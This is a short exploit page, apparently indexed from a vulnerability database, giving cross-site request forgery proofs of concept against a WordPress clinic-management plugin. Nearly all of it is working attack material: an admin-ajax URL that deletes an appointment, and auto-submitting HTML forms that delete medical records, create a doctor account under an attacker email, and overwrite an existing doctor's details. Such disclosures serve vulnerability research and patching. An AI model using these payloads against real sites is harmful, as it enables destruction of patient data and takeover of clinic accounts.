Share
## https://sploitus.com/exploit?id=WPEX-ID:E0741E2C-C529-4815-8744-16E01CDB0AED
Make a logged in admin open the following URL to make them delete the appointment with ID 1: https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=appointment_delete&id=1

Make a logged in admin open a page with the HTML code below

To make them delete the medial record with ID 1:

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
        <input type="text" name="route_name" value="medical_records_delete"/>
        <input type="text" name="id" value="1">
        <input type="submit" value="submit">
    </form>
</body>

To make them create a new doctor:

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
        <input type="text" name="user_email" value="attacker@domain.com">
        <input type="text" name="first_name" value="Attacker">
        <input type="text" name="last_name" value="Via CSRF">
        <input type="text" name="mobile_number" value="1">
        <input type="text" name="gender" value="other">
        <input type="submit" value="submit">
    </form>
</body>

To edit an existing doctor, add the ID and the correct email to the code above, e.g
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php?action=ajax_post" method="POST">
        <input type="text" name="ID" value="8">
        <input type="text" name="user_email" value="attacker@domain.com">
        <input type="text" name="first_name" value="Attacker">
        <input type="text" name="last_name" value="Via CSRF">
        <input type="text" name="mobile_number" value="1">
        <input type="text" name="gender" value="other">
        <input type="submit" value="submit">
    </form>
</body>

(This will change their name, mobile number and gender as well as reset their specialisation etc)